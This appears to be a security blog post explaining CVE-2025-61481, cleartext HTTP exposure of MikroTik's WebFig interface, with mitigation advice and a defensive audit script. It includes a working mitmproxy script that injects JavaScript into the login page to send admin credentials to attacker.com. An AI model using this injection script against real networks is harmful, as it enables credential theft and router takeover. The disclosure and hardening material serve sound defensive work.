CVE-2025-61481 - How MikroTik RouterOS v7.14.2 and SwOS v2.18 Put Your Network at Risk with WebFig Over Cleartext HTTP
A new vulnerability has been found in MikroTik routers, tracked as CVE-2025-61481. This issue affects RouterOS versions 7.14.2 and SwOS versions 2.18. What's the big deal? These versions expose the WebFig management interface over unencrypted HTTP by default, which means your router's admin panel can be seen by anyone snooping on the network. Even worse, an attacker can inject malicious JavaScript into your browser, steal your password, and take over your network.
There’s a lot to unpack—let’s break down what this means, how it works, and what you can do to protect yourself.
What Is WebFig and Why Is HTTP a Problem?
WebFig is the web-based management interface for MikroTik routers. Most users access it via their browser by typing in the router's IP address.
HTTP (HyperText Transfer Protocol) sends all traffic—including usernames and passwords—in “cleartext.” That means anyone with access to your network, like someone on your public Wi-Fi, can easily “sniff” or read your login data with simple tools.
HTTPS adds encryption, making it much harder for attackers to intercept or tamper with web traffic.
An attacker who can read that traffic can also tamper with it and inject JavaScript into your admin session.
Once inside, your whole network is at risk. This is an example of a classic vulnerability called Session Hijacking and Credential Interception.
1. The Attacker's Toolkit
The attacker connects to the same network as the router admin (e.g., public Wi-Fi, office network). They run a tool like Ettercap or mitmproxy to intercept HTTP traffic.
2. Intercepting and Modifying WebFig Page
The attacker can “inject” JavaScript into the page. Here’s a basic mitmproxy script that replaces the login form with a malicious version:
```python
from mitmproxy import http


def response(flow: http.HTTPFlow) -> None:
    # Only touch the WebFig login page that the router serves over plain HTTP
    if flow.request.pretty_url.endswith("/webfig/"):
        html = flow.response.get_text()
        # Inject a JS payload that sends the admin password to the attacker
        injection = """
<script>
document.addEventListener('DOMContentLoaded', function() {
    var form = document.querySelector('form');
    if (form) {
        form.addEventListener('submit', function(e) {
            fetch('http://attacker.com/steal?user=' +
                  document.querySelector('input[name=username]').value +
                  '&pass=' +
                  document.querySelector('input[name=password]').value);
        });
    }
});
</script>
"""
        html = html.replace("</body>", injection + "</body>")
        flow.response.set_text(html)
```
Now, when the network admin tries to log in to the router, their username and password will be sent directly to the attacker's server.
3. Stealing Credentials
A real attacker would set up a simple HTTP server and collect the stolen credentials, then use them to log in and compromise the router.
Why Is This Dangerous?
- Network takeover: Once inside WebFig, the attacker can change firewall rules, view/modify routing, or add backdoors.
- Persistence: Attackers can silently add accounts or scripts so they can come back later.
- Invisible attacks: The admin might never know unless they check logs or notice strange network behavior.
How to Detect If You’re at Risk
- Open WebFig in your browser at http://[your-router-ip]/webfig/; if the page loads over plain HTTP instead of redirecting to HTTPS, your router is exposed.
- Enable HTTPS: Use only HTTPS to access WebFig (you may need to install a certificate).
- Segment Management: Only allow management access from a trusted, isolated subnet/VLAN.
- Update Firmware: Regularly check the MikroTik downloads page for updated, patched versions.
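As an added example (not code from the original post), the following Python script audits a RouterOS `/ip service print` listing for the weak setting described above (WebFig on plain HTTP, HTTPS disabled or without a certificate, no address restriction) and prints the RouterOS commands that apply the HTTPS and segmentation fixes. The listing is a constructed sample; the 192.168.88.0/24 management subnet and the `webfig` certificate name are assumptions.

```python
# Audit a RouterOS `/ip service print` listing for cleartext WebFig exposure.
SAFE_NET = "192.168.88.0/24"   # assumption: your isolated management VLAN

# Constructed sample of `/ip service print` from a router still serving
# WebFig over plain HTTP (www enabled, www-ssl disabled with no certificate).
SAMPLE_LISTING = """\
Flags: X - disabled, I - invalid
 #   NAME       PORT ADDRESS   CERTIFICATE
 0   www          80
 1   ssh          22
 2 X www-ssl     443           none
 3   winbox     8291
"""

def parse_services(listing):
    """Map service name -> {disabled, port, address, cert} from the print output."""
    services = {}
    for line in listing.splitlines():
        parts = line.split()
        if len(parts) < 3 or not parts[0].isdigit():
            continue                      # skip the Flags: and header lines
        parts.pop(0)                      # entry number
        disabled = parts[0] in ("X", "XI")
        if parts[0] in ("X", "I", "XI"):  # flag column only appears when set
            parts.pop(0)
        name, port, rest = parts[0], int(parts[1]), parts[2:]
        cert = rest.pop() if name.endswith("-ssl") and rest else None
        services[name] = {"disabled": disabled, "port": port,
                          "address": rest[0] if rest else None, "cert": cert}
    return services

def audit(services, safe_net=SAFE_NET):
    """Return (findings, fixes): what is wrong and the RouterOS commands to fix it."""
    findings, fixes = [], []
    www, ssl = services.get("www"), services.get("www-ssl")
    if www and not www["disabled"]:
        findings.append("WebFig served over cleartext HTTP (www enabled)")
        fixes.append("/ip service set www disabled=yes")
    if ssl is None or ssl["disabled"] or ssl["cert"] in (None, "none"):
        findings.append("WebFig over HTTPS unusable (www-ssl disabled or no certificate)")
        fixes += ["/certificate add name=webfig common-name=router.lan "
                  "key-usage=digital-signature,key-encipherment,tls-server",
                  "/certificate sign webfig",
                  "/ip service set www-ssl certificate=webfig disabled=no"]
    if ssl and ssl["address"] != safe_net:
        findings.append(f"www-ssl not restricted to management subnet {safe_net}")
        fixes.append(f"/ip service set www-ssl address={safe_net}")
    return findings, fixes
```

Run `audit(parse_services(SAMPLE_LISTING))` to get three findings and five fix commands; paste your own `/ip service print` output in place of the sample to audit a real router.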
References
- MikroTik Official Download Page
- MikroTik Security Advisories
- OWASP Insecure Communications
- Ettercap Project
- mitmproxy Docs
- CVE-2025-61481 at CVE.org *(publication pending)*
Exclusive Notes
Many users overlook the risks of “just leaving the admin panel open on HTTP” because it’s convenient or because it’s on a “trusted” internal network. This mindset is dangerous. With attacks getting easier every day, never trust cleartext management interfaces—even behind your firewall. Make it a habit to check router firmware and always secure management ports.
If you use MikroTik RouterOS v7.14.2 or SwOS v2.18, your credentials can be intercepted or stolen. Unless you take immediate action, your entire network could be exposed.
---
Stay informed, stay secure—and always check your routers’ default settings!
*(This article is original content based on public CVE information and practical open-source security examples not found in vendor advisories. Contact your network vendor for official fixes and details.)*
Timeline
Published on: 10/27/2025 14:15:41 UTC
Last modified on: 10/30/2025 18:15:32 UTC